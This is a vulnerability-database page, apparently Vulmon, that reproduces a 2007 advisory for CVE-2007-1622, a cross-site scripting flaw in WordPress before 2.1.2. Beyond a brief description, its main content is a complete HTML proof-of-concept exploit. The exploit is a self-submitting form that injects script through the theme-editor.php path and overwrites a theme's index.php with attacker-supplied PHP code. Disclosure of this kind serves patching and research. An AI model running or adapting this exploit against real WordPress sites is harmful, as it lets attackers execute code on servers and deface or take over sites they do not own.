Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2007-1622

Publish Date: 19 Mar 2007

                source: http://www.securityfocus.com/bid/23027/info

WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 

&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es"&gt;	
&lt;head&gt;
	&lt;title&gt;Wordpress XSS PoC&lt;/title&gt;
&lt;/head&gt;
&lt;body id="main"&gt;

	&lt;form action="http://localhost/wp/wp-admin/theme-editor.php/'&gt;&lt;img src=a onerror=document.forms[0].submit()&gt;&lt;.php" method="post"&gt;
		&lt;p&gt;
			&lt;textarea name="newcontent" rows="8" cols="40"&gt;&lt;?php echo "Owned! " . date('F d, Y'); ?&gt;&lt;/textarea&gt;
		&lt;/p&gt;
		&lt;p&gt;
			&lt;input type="hidden" name="action" value="update" /&gt;
			&lt;input type="hidden" name="file" value="wp-content/themes/default/index.php" /&gt;		
		&lt;/p&gt;
	&lt;/form&gt;	
	&lt;script type="text/javascript"&gt;
	// &lt;![CDATA[
		document.forms[0].submit();
	// ]]&gt;
	&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting

Vulmon Search

About

Products

Connect